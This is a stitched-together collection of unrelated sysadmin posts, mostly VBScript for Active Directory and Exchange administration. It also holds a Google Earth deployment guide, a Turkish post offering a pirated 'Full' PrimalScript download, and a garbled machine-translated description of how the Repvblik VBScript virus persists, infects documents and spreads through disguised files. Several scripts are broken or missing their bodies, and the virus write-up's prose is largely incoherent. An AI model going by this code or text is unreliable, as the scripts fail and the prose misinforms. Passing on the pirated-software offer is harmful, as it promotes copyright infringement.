Basically the OAB wont generate entries for users who's "Email" field in AD is blank (or, in fact, not the same as the "Reply To" address in Exchange).

What do you do if you have multiple users who are incorrect, and you need to fix it (but don't want to spend hours finding / fixing accounts one at a time)?

You script it of course.

DSQuery user (you may need the -limit flag) > objects.txt
Edit to remove the MS command crap (so that it starts @ your first user)
Save the following script as a vbs file (in the same folder as your objects.txt) and run.

' This code will output all users without a email address in AD who should have one.
' It will also change the address (if required)
' Writted by Stephen Croft from ANS
'
strtextfile = "objects.txt"
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objTextFile = objFSO.OpenTextFile(strtextfile, 1, False, 0)
Dim primary
strSMTP = "SMTP"
Do
strobject = objTextFile.ReadLine
strobject = Mid(strobject,2,Len(strobject)-2)
Set objObject = GetObject("LDAP://" & strObject)
on error resume next
'Gets current Email AD Field?
intEmail = objObject.Get("mail")
'Finds Primary Email Address from "proxyAddresses"
For Each EMail In objObject.GetEx("proxyAddresses")
primary = InStr(1,EMail,strSMTP,0)
If primary = 1 Then
Intproxy2 = Right(EMail,Len(EMail)-5)
End If
Next
'Should the user have an address (i.e. is there a primary SMTP)?
If intProxy2 "" Then
'Echos to command object that is blank, and correct email address.
If intEmail = "" Then
WScript.Echo strobject & " is blank, should be " & Intproxy2
'Changes AD object (2 lines of code) to have Primary as AD Email
objObject.Put "mail", intProxy2
objObject.SetInfo
End if
Else
End If
'Blanks all variables to keep it functioning properly
intEmail = ""
intProxy = ""
intProxy2 = ""
Loop Until objtextfile.AtEndOfStream = True

The bolded lines change the objects, probably best REM’ing these out and testing what it wants to change (and to what for that matter) by running it from a cmd prompt, and piping it into a output.txt of some sort.

And excuse my scripting, it’s not always the tidiest (but it works goddamn it!! :P )

Have fun :)

Installing Google Earth Pro 4 in a corporate environment using SMS using a per-machine based installation.

This solution consists of 5 main steps:

1. Do an installation of Google Earth, including the registration information. This puts down a bunch of files into C:\Documents and Settings\USERNAME\Application Data\Google\GoogleEarth. As well as a whole lotta reg keys under HKEY_CURRENT_USER\Software\Google.

2. Put these files into a safe location. Export the registry keys into a .reg file.

3. I created an msi to dump these files and the .reg file into the Program Files>Google Earth directory. I also created an Active Setup key to run a script when the user next logs in to the machine. It's located at HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\GoogleEarth and
I created ComponentID, StubPath and Version. There are better places to read up on Active Setup...
The last thing I put into the msi was the vbscript referred to in the StubPath key.

4. This script which will be on the local machine and run as the user should create C:\Documents and Settings\USERNAME\Application Data\Google\GoogleEarth where you replace USERNAME with the correct user. Then there are 4 reg keys that contain this path. I created them in vbscript as follows:

Const HKEY_CURRENT_USER = &H80000001
strComputer = "."
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & strComputer & "\root\default:StdRegProv")

' Create the two keys if they don't exist
strKeyPath = "Software\Google\CommonSettings"
oReg.CreateKey HKEY_CURRENT_USER,strKeyPath
strKeyPath = "Software\Google\Google Earth Pro"
oReg.CreateKey HKEY_CURRENT_USER,strKeyPath

' All keys have the same strValue
strValue = "C:\Documents and Settings\" & strUser & "\Application Data\Google\GoogleEarth"

strKeyPath = "Software\Google\CommonSettings"
strValueName = "KmlPath"
oReg.SetStringValue HKEY_CURRENT_USER,strKeyPath,strValueName,strValue

' Same strKeyPath from here on
strKeyPath = "Software\Google\Google Earth Pro"
strValueName = "DefaultKMLPath"
oReg.SetStringValue HKEY_CURRENT_USER,strKeyPath,strValueName,strValue

strValueName = "KmlPath"
oReg.SetStringValue HKEY_CURRENT_USER,strKeyPath,strValueName,strValue

strValueName = "CachePath"
oReg.SetStringValue HKEY_CURRENT_USER,strKeyPath,strValueName,strValue

Then, I copy the required user files into their profile..

Const OverWriteFiles = True
objFSO.CopyFolder "C:\Program Files\Google\Google Earth Pro\UserFiles", strDirectory, OverWriteFiles

And then install all the other registry keys into current user. This includes the registration information

strCommand1 = "regedit.exe /s " & Quotes & PWD & "UserFiles\google_current_user.reg" & Quotes
WScript.Echo strCommand1
return = objShell.Run (strCommand1,0,True)

5. To get all this to run through SMS, I wrote a vbscript which performs the install with .iss file
"GoogleEarthWinProSetup.exe /s /SMS /f1setup.iss /f2c:\google.log". Of course, do what you have to do to correctly point to the setup and iss files. After that I found that googleearth.exe was running, so I kill that process so that it doesn't go off and create reg keys. Lastly, I install my msi.

Clear as mud!

They generate an encrypted with the condition. How in the handling of viruses such as this? Follow this discussion more times!

Closer trends of VBScript is not yet finished. Tthe virus to make local action. This time we will try to discuss one of the VBScript viruses diversified, which use other techniques in infection. Indeed dike tahui virus is likely the virus is not the latest release, the TAP technology is carried other than the virus usually VBScript and there are still some readers who complained about the virus. This virus has the original file size of 5,915 bytes. Small enough, huh?This is one of the advantages possessed by the virus types VBScript, because the size of the file the virus is a relatively small feed for value-added rate can accelerate the spread of this virus.

The virus can run smoothly on the Windows XP operating system that we test it. Glance, if seen in the visual use Notepad, type of virus that has extension .Extension. vbs in this present condition encrypted. We can know when opened, because the only characters that appear strange, however, if more circumspect, at the top of there string string "RPVBLK = True" or "RPVBLK = False", and at the bottom there is a normal routine as the decryptor which can be read.

Enkripsi Encryption

Not difficult to do in the body of the description of the virus.Because any encryption, which also apply it, the past can be disclosed because the body is actually in there decryptor routine, which will translate to byte-per-byte in its original form. Encryption that he do is just play the game characters, only the progress or reverse the characters are, usually known as the Caesar Cipher. The camp only do insert some routine that will make dumping in the text that has indicated camp and can easily learn gestures from the virus source code.

When the whole body of the virus successfully in-Decrypt, right at the top of the script source, the visible string some comments that marked as "Repvblik Ver 2.0 ^_^!", and also beberapa pesan yang ia sampaikan. some of it to the message.

Virus di StartUp Virus in the startup

The first is, of course, he did create the master file. So, when the virus executed on a clean computer, it will create an original master file that he placed in the directory of your start up, which can be found in the Start Menu> startup by the name Repvblik.vbs. itself, if the file is the master file or files that have been infected? ling over the script's source, namely, "RPVBLK" that can be valuable True or False. File parent virus will also be running automatically when Windows starts.

Messages

Along with the addition, it will create a new directory on drive C: \ with the name Repvblik. In the directory or folder, you will find a text file with the name Repvblik.txt which is a message from the creator of the virus. Not only are there, because in each of the first directory level, he certainly will not find the file there Repvblik.txt. And while active in memory, if viewed using Task Manager, Task Manager, users will not be able to see the process with the name of the virus resembles vbs file name, because when a file is accessed or vbs clicked, Windows will automatically run a program that can be wscript.exe as a translator from the script. Jadi saat virus ini aktif, process virus yang tampak di Task Manager hanyalah process wscript.exe. So when the virus is active, the process of viruses that appear in the Task Manager is wscript.exe process. Quite difficult to specify whether the wscript.exe vbs file to run a virus or not, as some users can still utilize the VBScript language to create a small script that can ease the work. However, if you use the more advanced programs, such as Process Explorer, You can track every detail of process. Only by clicking on the desired process right, and then click Properties, you will find information on what the script is run by wscript.exe on the editbox Command Line in the Process Explorer.

Documents infection!

After the master file is created successfully, he immediately launched latest moment, namely, Files that will infect  by this virus is files with the extensions DOC, XLS, PPT, PPS, and that RTF is not foreign in your eyes. The infecting groove can be all learned to read with a clear routine functions that give it a name explore_folder_and_infect_file found on the body. How they actually do is very simple, he will find in the My Documents directory of files with the extensions included in the sub directory, if he find it with a sprightly, he will infect its. With previous he had to delete the contents of the folder that contains Recent data file that was last opened.

How infecting is the way to append files infected document that will be at the bottom of the body of the virus. So if you have files with names such as Projects. doc, the virus will read the entire contents of the file, then get the contents of the document file is in the bottom of the body of the virus, and give a sign of the string "RPVBLK = False" in the early part of the body of the virus, which means the virus has already infected files. This is also done by other viruses that have the ability injection, so the file infected is not infected again. And file the original document will be deleted. Of course, now have your document file into a file VBScript, which of course can not be opened with Microsoft Word. However, you do not need to confusing, let PCMAV do its work to restore the document to your circumstances such as when first document.Last time it infected file is run, the virus will be first to extract the files contained documents on his body in the current directory, then run again himself, and as if Coolest nothing happens.

Registry manipulation

Repvblik virus, it will be a canny attempt to change the default icon of each file vbs to use Microsoft Word icon. And change the file type is a "Microsoft Word Document," and the extension of the display. Vbs in Windows Explorer by adding items NeverShowExt on key VBSFile in the Windows Registry. Of course, if this is the case, the user public will not be able to distinguish between the original files are files with the virus.

Rename MP3 Rename MP3

Not only menginfeksi documents, he began to infect music files to your MP3 collection. Each MP3 file that he will be found in the rename-by. That he do is add the string "Repvblik_" in front of the name of the MP3 file that he will infected.

Flash Disk Flash Disk

Be careful if you find files with names such as "I am So Sorry.txt.vbs", "Free SMS via GPRS.txt. vbs”,”Indonesian and their corruption!! vbs "," English and their corruption! .txt.vbs”,”Never be touched!! . txt.vbs "," Never be touched! .txt.vbs”,”Make U lofty.txt.vbs”,”Thank U Ly.txt. . txt.vbs "," U Make lofty.txt.vbs, "" Thank U Ly.txt. vbs”,” The Power of Midwife.txt.vbs ", or" NenekSihir and her Secrets.txt.vbs "device on your removable disk, it is the name of the file that he normally use to spread.

Source paper: http://www.pcmedia.co.id by Arief Prabowo Arief Prabowo

The original process involved the helpdesk giving themselves access to the mailbox in question, creating an outlook profile for the users mailbox,  and  starting outlook to set the OOF message, and finally revoking the permissions to the users mailbox. After performing an audit of mailbox permissions it became obvious that the final step of revoking permissions was being frequently overlooked.

The script consists of a few simple steps

1. Perform and AD search for the users samaccountname and return their exchange server.
2. Grant full control to the mailbox for the helpdesk staff member.
3. Create a mapi profile for the mailbox.
4. Get/Set the current OOFmessage.
5. Toggle the Out of Office status flag.

The process of managing the removal of mailbox permissions is handled in the window unload function of the browser.

Listing 1 - OOF.HTA

<html>
<head>
<title>Set out of Office Message</title>
<HTA:APPLICATION
ID="OOF"
APPLICATIONNAME="Set Out Of Office Message"
SCROLL="yes"
SINGLEINSTANCE="yes"
>
</head>
<SCRIPT LANGUAGE="VBScript">
option explicit

Rem reference http://www.cdolive.com/outofofficecalendar.htm
Rem Updated to grant and remove permissions to the mailbox automatically

CONST ADS_ACEFLAG_INHERIT_ACE = 2
CONST ADS_RIGHT_DS_CREATE_CHILD = 1
CONST ADS_ACETYPE_ACCESS_ALLOWED = 0
Const ACE_MB_FULL_ACCESS = &h1

Rem Define all our variables
Dim strProfileInfo, CDOSession, strOOFText, objButton, objInfostore,CdoFolderRoot
Dim objConnection, objCommand, objRecordSet, intRetcode, objOption
Dim strExchsvr, strPath, objUser, objTrustee, strTrustee, WshNetwork,boolRightsSet, objshell
Dim objMBXlist, oSecurityDescriptor, dacl, ace, arrTemp

'*****************************************************************************
'* function window_onload
'* Purpose: Initialise all the global variables required to proceed or
'* terminate the application.
'* Inputs: none
'* Returns: nothing
'*****************************************************************************
sub window_onload
  on error resume next
  set objMBXlist = createobject("scripting.dictionary")
  if err.number = 0 then
    on error goto 0
    strTrustee = getTrusteeName()
  else
    msgbox "Fatal Error - Could not create dictionary object." & vbcrlf & "Application will now close.", VBCRITICAL
    self.close()
  end if
  if strTrustee = "" then
    msgbox "Fatal Error - Could not get logged on user info." & vbcrlf & "Application will now close.", VBCRITICAL
    self.close()
  end if
  inorout.checked = False
end sub

'*****************************************************************************
'* function window_onload
'* Purpose: ensure the removal of access rights from all accessed mailboxes
'* terminate the application.
'* Inputs: none
'* Returns: nothing
'*****************************************************************************
sub window_onunload
  for each strPath in objMBXlist.keys
    removeMbxRights strpath,objMBXlist.item(strPath)
  next
end sub

'*****************************************************************************
'* function getTrusteeName
'* Purpose: get the username and domain for the helpdesk staff to be added to
'* the access control list on the users
'* Inputs: none
'* Returns: String in the format domain\username
'*****************************************************************************
function getTrusteeName
  on error resume next
  Set WshNetwork = CreateObject("WScript.Network")
  if err.number = 0 then
    getTrusteeName = WshNetwork.UserDomain & "\" & WshNetwork.UserName
  else
    getTrusteeName = ""
    err.clear
  end if
  on error goto 0
end function

'*****************************************************************************
'* function get_OOF_TEXT
'* Purpose: get the users current "Out of Office" Message into a text box
'* Inputs: none
'* Returns: nothing
'*****************************************************************************
sub get_OOF_TEXT
  disablecontrols(True)
  strProfileInfo = strExchsvr & vbLf & staffcode.value
  Set CDOSession = CreateObject("MAPI.SESSION")
  on error resume next
  CDOSession.Logon "", "", False, True, 0, False, strProfileInfo
  if err.number = 0 then
    OOF_TEXT.value = CDOSession.OutOfOfficeText
    if CDOSession.OutOfOffice = True then
      inorout.checked = True
    else
      inorout.checked = False
    end if
    inorout.disabled = "false"
    CDOSession.Logoff
  else
    msgbox "Error logging on to mailbox." & vbcrlf & err.number & vbcrlf _
      & err.description & vbcrlf & _
      "Wait a few minutes for AD permissions to replicate and try again!", VBCRITICAL
  end if
  on error goto 0
  Set CDOSession = Nothing
  disablecontrols(False)
end sub

'*****************************************************************************
'* function set_OOF_TEXT
'* Purpose: set the users current "Out of Office" Message from text box value
'* Inputs: none
'* Returns: nothing
'*****************************************************************************
sub set_OOF_TEXT
  disablecontrols(False)
  strProfileInfo = strExchsvr & vbLf & staffcode.value
  Set CDOSession = CreateObject("MAPI.SESSION")
  on error resume next
  CDOSession.Logon "", "", False, True, 0, False, strProfileInfo
  if err.number = 0 then
    CDOSession.OutOfOfficeText = OOF_TEXT.value
    CDOSession.OutOfOffice = True
    inorout.checked = True
    inorout.disabled = "false"
    CDOSession.Logoff
  else
    msgbox "Error logging on to mailbox." & vbcrlf & err.number & vbcrlf _
    & err.description & vbcrlf & _
    "Wait a few minutes for AD permissions to replicate and try again!", VBCRITICAL
  end if
  on error goto 0
  Set CDOSession = Nothing
  disablecontrols(False)
end sub

'*****************************************************************************
'* function finduser
'* Purpose: perform active directory query
'* Inputs: none
'* Returns: nothing
'*****************************************************************************
sub finduser()
  Set objConnection = CreateObject("ADODB.Connection")
  objConnection.Open "Provider=ADsDSOObject;"
  Set objCommand = CreateObject("ADODB.Command")
  objCommand.ActiveConnection = objConnection

  ' search for the users staffcode from accounts that aren't disabled
  objCommand.CommandText = _
    "<GC://dc=acme,dc=com,dc=au>;" & _
    "(&(&(objectClass=user)(objectCategory=person))(&(samaccountname=" & staffcode.value & _
    ")(!userAccountControl:1.2.840.113556.1.4.803:=2)));" & _
    "name,adspath,msExchHomeServerName;subtree"

  Set objRecordSet = objCommand.Execute
  if objRecordSet.recordcount > 1 then
    intRetcode = msgbox("Error - More than one active account with staffcode " & _
      staffcode.value & " found!" & vbcrlf & "List ldap path of accounts?",VBCRITICAL+VBYESNO)
    if intRetcode = VBYES then
      do While Not objRecordset.EOF
        Set objOption = Document.createElement("OPTION")
        objOption.Text = objRecordset.Fields("adspath")
        objOption.Value = objRecordset.Fields("adspath")
        SearchResults.Add(objOption)
        objRecordset.MoveNext
      loop
      SearchResults.style.visibility ="Visible"
    else
      SearchResults.style.visibility ="Hidden"
    end if
    exit sub
  end if
  if objRecordSet.recordcount = 0 then
      msgbox "Failed to find staffcode in active directory" & VBCRLF & "Check the staffcode is correct", VBCRITICAL
      exit sub
  end if
  intRetcode = msgbox("StaffCode " & staffcode.value & " found!" & vbcrlf & _
    "Grant full control to mailbox for " & strTrustee,VBINFORMATION+VBYESNO)
  if intRetcode = VBNO then
    setbutton.disabled = "True"
    getbutton.disabled = "True"
    inorout.disabled = "True"
    inorout.checked = False
    exit sub
  end if
  do While Not objRecordset.EOF
    strExchsvr = objRecordset.Fields("msExchHomeServerName")
    arrTemp = split(strExchsvr, "=")
    strExchsvr = arrtemp(ubound(arrtemp))
    strPath = replace(objRecordset.Fields("adspath"),"GC://", "LDAP://")
    objRecordset.MoveNext
  loop
  objConnection.Close
  if setMbxRights(strPath, strTrustee) = True then
    setbutton.disabled = "false"
    getbutton.disabled = "false"
  end if
end sub

'*****************************************************************************
'* function disablecontrols
'* Purpose: activate/de-activate controls as appropriate to application state
'* Inputs: none
'* Returns: nothing
'*****************************************************************************
sub disablecontrols(booldisable)
  progress.style.visibility = "Visible"
  if booldisable = True then
    setbutton.disabled = "True"
    getbutton.disabled = "True"
    inorout.disabled = "True"
  else
    progress.style.visibility = "hidden"
    setbutton.disabled = "False"
    getbutton.disabled = "False"
    inorout.disabled = "False"
  end if
end sub

'*****************************************************************************
'* function setMbxRights
'* Purpose: add trustee to the users mailbox with full control
'* Inputs: string - the adspath of the users mailbox
'* string - the trustee's domain & username, formatted domain\username
'* Returns: boolean, true if succesful
'*****************************************************************************
function setMbxRights(adspath,strTrustee)
  setMbxRights = False
  if not objMBXlist.exists(adspath) then objMBXlist.add adspath,strTrustee
  set objUser = GetObject(adspath)
  on error resume next
  Set oSecurityDescriptor = objUser.MailboxRights
  if err.number <> 0 then
    if err.number = 438 then
      msgbox "This application must be run on a workstation with" & vbcrlf _
        & "the exchange management tools installed!", vbcritical
      err.clear
      exit function
    else
      msgbox "Error getting mailbox security Descriptor." & vbcrlf _
        & err.description & vbcrlf and err.number, vbcritical
      exit function
    end if
  end if
  on error goto 0
  Set dacl = oSecurityDescriptor.DiscretionaryAcl
  AddAce dacl, strTrustee, ADS_RIGHT_DS_CREATE_CHILD, _
    ADS_ACETYPE_ACCESS_ALLOWED, ADS_ACEFLAG_INHERIT_ACE, 0, 0, 0
  oSecurityDescriptor.DiscretionaryAcl = dacl
  ' Save new SD onto the user.
  objUser.MailboxRights = oSecurityDescriptor
  ' Commit changes from the property cache to the information store.
  objUser.SetInfo
  setMbxRights = True
end function

'*****************************************************************************
'* function removeMbxRights
'* Purpose: remove trustee from all mailboxes to which it was added
'* Inputs: string - the adspath of the users mailbox
'* string - the trustee's domain & username, formatted domain\username
'* Returns: boolean, true if succesful
'*****************************************************************************
sub removeMbxRights(adspath,strTrustee)
  set objUser = GetObject(adspath)
  Set oSecurityDescriptor = objUser.MailboxRights
  Set dacl = oSecurityDescriptor.DiscretionaryAcl
  For Each ace In Dacl
    If (LCase(ace.trustee) = LCase(strTrustee)) and _
      ((ace.AccessMask AND ACE_MB_FULL_ACCESS)=ACE_MB_FULL_ACCESS) Then
      Dacl.RemoveAce ace
      MsgBox "Mailbox rights have been removed", VBINFORMATION
    End If
  Next
  oSecurityDescriptor.DiscretionaryAcl = dacl
  ' Save new SD onto the user.
  objUser.MailboxRights = oSecurityDescriptor
  ' Commit changes from the property cache to the information store.
  objUser.SetInfo
end sub

'********************************************************************
'* Code shamelessly copied from Microsoft KB310866
'* http://support.microsoft.com/kb/310866
'* Function AddAce(dacl, TrusteeName, gAccessMask, gAceType,
'* gAceFlags, gFlags, gObjectType, gInheritedObjectType)
'*
'* Purpose: Adds an ACE to a DACL
'* Input: dacl Object's Discretionary Access Control List
'* TrusteeName SID or Name of the trustee user account
'* gAccessMask Access Permissions
'* gAceType ACE Types
'* gAceFlags Inherit ACEs from the owner of the ACL
'* gFlags ACE has an object type or inherited object type
'* gObjectType Used for Extended Rights
'* gInheritedObjectType
'*
'* Output: Object - New DACL with the ACE added
'*
'********************************************************************

Function AddAce(dacl, TrusteeName, gAccessMask, gAceType, gAceFlags, gFlags, gObjectType, gInheritedObjectType)
  Dim Ace1
  ' Create a new ACE object.
  Set Ace1 = CreateObject("AccessControlEntry")
  Ace1.AccessMask = gAccessMask
  Ace1.AceType = gAceType
  Ace1.AceFlags = gAceFlags
  Ace1.Flags = gFlags
  Ace1.Trustee = TrusteeName
  'See whether ObjectType must be set
  If CStr(gObjectType) <> "0" Then
    Ace1.ObjectType = gObjectType
  End If

  'See whether InheritedObjectType must be set.
  If CStr(gInheritedObjectType) <> "0" Then
    Ace1.InheritedObjectType = gInheritedObjectType
  End If
  dacl.AddAce Ace1

  ' Destroy objects.
  Set Ace1 = Nothing
End Function

'*****************************************************************************
'* function setINOUT
'* Purpose: set the users OOF flag to activate/de-activate OOF processing
'* Inputs: none
'* Returns: nothing
'*****************************************************************************
sub setINOUT
  disablecontrols(True)
  strProfileInfo = strExchsvr & vbLf & staffcode.value
  Set CDOSession = CreateObject("MAPI.SESSION")
  on error resume next
  CDOSession.Logon "", "", False, True, 0, False, strProfileInfo
  if err.number = 0 then
    if inorout.checked = True then
      CDOSession.OutOfOffice = True
    else
      CDOSession.OutOfOffice = False
    end if
    CDOSession.Logoff
  else
    msgbox "Error logging on to mailbox." & vbcrlf & err.number & vbcrlf _
      & err.description, VBCRITICAL
  end if
  on error goto 0
  Set CDOSession = Nothing
  disablecontrols(False)
end sub
</SCRIPT>

<body>
<B>Step 1. Enter the user's staff code</B><P>
<input type="text" name="staffcode" size="30">
<input id=srchbutton class="button" type="button" value="Search for User" name="set_text_button" onClick="finduser">
<select size="5" name="SearchResults" style="Visibility:hidden">
</select>
<P><P>
<B>Step 2. Retrieve/Set the users Out of Office message</B><p><p>
<textarea name="OOF_TEXT" rows=5 cols=70></textarea><p>
<input disabled id=getbutton class="button" type="button" value="Get Message" name="get_text_button" onClick="get_OOF_TEXT">
<input disabled id=setbutton class="button" type="button" value="Set Message" name="set_text_button" onClick="set_OOF_TEXT">
<input disabled id=inorout type="checkbox" name="InorOUT" value="IN" checked="False" onClick="setINOUT"> I am currently out of the office
<P>
<span id="Progress" style="visibility:Hidden">
Operation in progress - please wait&nbsp;&nbsp;&nbsp;&nbsp;<img src="loading.gif" border="0" width="165" height="15">
</span>
<p><p><B>Step 3. Send a test email</B><p><p>
</body>

E.g.

To convert formatted value from,

yyyymmddHHMMSS.mmmmmmsUUU to yyyy-mm-dd HH:MM:SS:mmm

Function:

Function DateConvert(CMIDate)
On Error Resume Next
Set DateTime = CreateObject("WbemScripting.SWbemDateTime")
DateTime.Value = CMIDate
DateConvert = DateTime.GetVarDate
Set DateTime = Nothing
End Function

The below example will pull all "Error" event logs from the local computer and echo them to the shell. Each event log has its "TimeGenerated" property In CIM Format, they are converted to the VT_Date format using the above function before being echoed out.

Example:

Dim StrComputer
Dim ObjWMIService
Dim propValue
Dim objItem
Dim SWBemlocator
Dim UserName
Dim Password
Dim ColItems
UserName = ""
Password = ""
StrComputer = "."

Set SWBemlocator = CreateObject("WbemScripting.SWbemLocator")
Set objWMIService = SWBemlocator.ConnectServer(strComputer,"root\CIMV2",UserName,Password)
Set colItems = objWMIService.ExecQuery("Select * from Win32_NTLogEvent WHERE "&_
"LogFile = 'System' AND Type = 'Error'",,48)
For Each objItem In ColItems
Wscript.Echo DateConvert(objitem.TimeGenerated) & "," & objItem.ComputerName & "," &_
objItem.Logfile & "," & objItem.EventCode
Next

Function DateConvert(CMIDate)
On Error Resume Next
Set DateTime = CreateObject("WbemScripting.SWbemDateTime")
DateTime.Value = CMIDate
DateConvert = DateTime.GetVarDate
End Function

See this Link for MSDN information on the SWBemDateTime object.

Hope this Helps.

So I created a little script that will check users to see if they are set to inherit or not.

First, create a new folder. Get a list of all users in your AD (or a specific OU) by doing the following;

Now, create a VBScript file with the following content;

' This code will output all users who are currently NOT inhereting
' Security from above.
' Writted by Stephen Croft and Chris Stos-Gale from ANS
'
strtextfile = "objects.txt"
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objTextFile = objFSO.OpenTextFile(strtextfile, 1, False, 0)
Const SE_DACL_PROTECTED = 0 ' set to 0 to enable inheritance

Loop Until objtextfile.AtEndOfStream = True

And save in the same folder as your objects.txt file that the first part created.

Now, back to command prompt for the following;

Where test.vbs is your vbs file you created (obviously).

This will create a output txt file (test.txt in this matter) that is Tab Seperated (for Excel import) of all users who are NOT inheriting rights from above.

To change them to be inheriting, either pick through the list manually, or edit the VBS script slightly as per below;

' This code will output all users who are currently NOT inhereting
' Security from above.
' Writted by Stephen Croft and Chris Stos-Gale from ANS
'
strtextfile = "objects.txt"
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objTextFile = objFSO.OpenTextFile(strtextfile, 1, False, 0)
Const SE_DACL_PROTECTED = 0 ' set to 0 to enable inheritance

Loop Until objtextfile.AtEndOfStream = True

Obviously be careful with this, and don't hold me responsible if it breaks anything!!!

PrimalScript, her türlü scriptleri yazabileceğini ve düzenleyebilecğeiniz, şiddetle tavsiyem olan bir editördür. Enterprise ve Full versiyonudur.

PrimalScript Enterprise 4 Full

Dosya İndirmekte güçlük çekiyorsanız tıklayın.

DOWNLOAD

I start by gathering the subject matter for the email and exporting the data into an XML formatted String.

Exporting an AD User Object to XML

Once you have the XML data in the String, still within the VBScript you use the XMLDOM object to convert the XML String into HTML using an XSLT style sheet. This enables you to take raw data and apply XPath logic to it. This also enables you to both enhance the look of your email and make it intelligent on the content selection. When completed, just pass the HTML formatted String into the email code for generating an email message.

XML to HTML Convertion Code,

StrHTML = XMLtoHTML(StrXML,XSLTFile
Function XMLtoHTML(XML,XSLT)
On Error Resume Next
Dim xmldoc, xsldoc
Set xmldoc=CreateObject("Microsoft.XMLDOM")
Set xsldoc=CreateObject("Microsoft.XMLDOM")
xmlDoc.async="false" xmlDoc.loadXML(XML)
xslDoc.async="false" xslDoc.load(XSLT)
XMLtoHTML = xmlDoc.transformNode(xslDoc)
End Function

Note: This is for formatting an XML source as a String. If using an XML file as the source, the syntax is slightly modified.

If you would like any more information on this or a more detailed Blog Post let me know.

I call these subroutines when opening and closing ADODB Sessions.

Note: The Strings 'oRoot,sBase,sDepth,Conn,Comm,sDomain' need to be PUBLIC Strings. (Declared at the top of the script.)

E.g.

Dim oRoot,sDomain,Conn,Comm,sBase,sDepth

When opening the session/connection you need to pass the "Context" of the container required.
Once completed you just need to call the 'ADODisconnect' to clean up the connection.

See below.

Sub ADOConnect(Context)
Set oRoot = GetObject("LDAP://rootDSE")
sDomain = oRoot.Get(Context)
Set oDomain = GetObject("LDAP://" & sDomain)
Set Conn = CreateObject("ADODB.Connection")
Set Comm = CreateObject("ADODB.Command")
sBase = "<" & oDomain.ADsPath & ">"
sDepth = "subTree"
Conn.Provider = "ADsDSOObject"
Conn.Open "ADs Provider"
Comm.ActiveConnection = Conn
Comm.Properties("searchscope") = 100
Comm.Properties("Page Size") = 1000
Comm.Properties("Cache Results") = False
Comm.CommandTimeout = 15
End Sub
Sub ADODisconnect()
Set oRoot = Nothing
Set oDomain = Nothing
Set Conn = Nothing
Set Comm = Nothing
sDomain = ""
sBase = ""
sDepth = ""
End Sub

An example of using these subroutines would be to connect to AD by passing the correct context to the ADOConnect Sub and then using an LDAP filter pull the displayName attribute from a user object.

Note: Replace "UserCN" with a valid user object 'common name'.

See Below.

Dim oRoot,sDomain,Conn,Comm,sBase,sDepth
sFilter = "(cn=UserCN)"
Call ADOConnect("defaultNamingContext")
sAttribs = "distinguishedName"
sQuery = sBase & ";" & sFilter &  ";" & sAttribs & ";" & sDepth
Comm.CommandText = sQuery
 Set rs = Comm.Execute
  If Not rs.eof Then
   rs.MoveFirst
   Set oUser = GetObject("LDAP://" & rs("distinguishedName") )
   WScript.Echo "User: " & oUser.displayName
  Else
   Wscript.Echo "User Not Found"
  End If
Set oUser = Nothing
rs.close
ADODisconnect()
WScript.Quit

Sub ADOConnect(Context)
Set oRoot = GetObject("LDAP://rootDSE")
sDomain = oRoot.Get(Context)
Set oDomain = GetObject("LDAP://" & sDomain)
Set Conn = CreateObject("ADODB.Connection")
Set Comm = CreateObject("ADODB.Command")
sBase = "<" & oDomain.ADsPath & ">"
sDepth = "subTree"
Conn.Provider = "ADsDSOObject"
Conn.Open "ADs Provider"
Comm.ActiveConnection = Conn
Comm.Properties("searchscope") = 100
Comm.Properties("Page Size") = 1000
Comm.Properties("Cache Results") = False
Comm.CommandTimeout = 15
End Sub

Sub ADODisconnect()
Set oRoot = Nothing
Set oDomain = Nothing
Set Conn = Nothing
Set Comm = Nothing
sDomain = ""
sBase = ""
sDepth = ""
End Sub

Hope this helps.

I often utilize this technique when I am disabling a users mailbox in Active Directory.  One step during the disablement process is to remove a users mail enabled group memberships; this limits delivery failures while the account is retained in AD for a cool off period.  The XML files created during the disablement process are kept until the account is removed from Active Directory.

To export a users details we use an ADODB connection to AD, and locate the users account using LDAP. Once the account is retained in a 'Record Set', you can save the appropriate properties into a String. The XML formatting is added to the String during the export of properties from the 'Record Set'. Once the String build is completed, the String is written to a file with a .XML extension.

This resultant file can then be parsed in the future using the XML-DOM object.

(I will go over an example of that in another article.)

So to the code,

On Error Resume Next
Dim StrXML, XMLFile, OutFile, StrArg
Const ForReading = 1
Const ForWriting = 2
Set oFSO = CreateObject("Scripting.FileSystemObject")
StrXML = ""
StrXML = StrXML & "<?xml version="&Chr(34)&"1.0"&Chr(34)&_
" encoding="&Chr(34)&"UTF-8"&Chr(34)&"?>"&vbNewLine
StrArg = InputBox("Please Enter Users 'Common Name'","Input Request")
If StrArg = "" Then
Call MsgBox("'Common Name' was not entered.",16,"Status")
End If
StrXML = StrXML & "<UserDump Date = '"&Now&"'>"&vbNewLine
StrXML = StrXML & GetUserData(StrArg)
StrXML = StrXML & "</UserDump>"&vbNewLine
XMLFile = "C:\"&StrArg&"_"&Month(Date)&"_"&Day(Date)&"_"&year(Date)&"_"&Hour(Time)&"_"&_
Minute(Time)&".xml"
Set OutFile = oFSO.OpenTextFile(XMLFile,ForWriting,True)
OutFile.write StrXML
Function GetUserData(cn)
On Error Resume Next
Dim oRoot,sDomain,Conn,Comm,sBase,sDepth
Dim sAttribs, sQuery, sFilter, sData
sData = ""
Set oRoot = GetObject("LDAP://rootDSE")
sDomain = oRoot.Get("defaultNamingContext")
Set oDomain = GetObject("LDAP://" & sDomain)
Set Conn = CreateObject("ADODB.Connection")
Set Comm = CreateObject("ADODB.Command")
sBase = "<" & oDomain.ADsPath & ">"
sDepth = "subTree"
Conn.Provider = "ADsDSOObject"
Conn.Open "ADs Provider"
Comm.ActiveConnection = Conn
Comm.Properties("searchscope") = 100
Comm.Properties("Page Size") = 1000
Comm.Properties("Cache Results") = False
Comm.CommandTimeout = 15
If Err.Number <> 0 Then
Call MsgBox("Failed"&vbNewLine&"Error: "&Err.Number&vbNewLine&"Description: "&Err.Description,16,"Error")
Err.Clear
WScript.Quit
End If
sFilter = "(&(objectCategory=person)(objectClass=user)(cn="&cn&"))"
sAttribs = "adspath" 'LDAP filter return attributes
sQuery = sBase & ";" & sFilter &  ";" & sAttribs & ";" & sDepth
Comm.CommandText = sQuery
Set rs = Comm.Execute 'Returned recordset
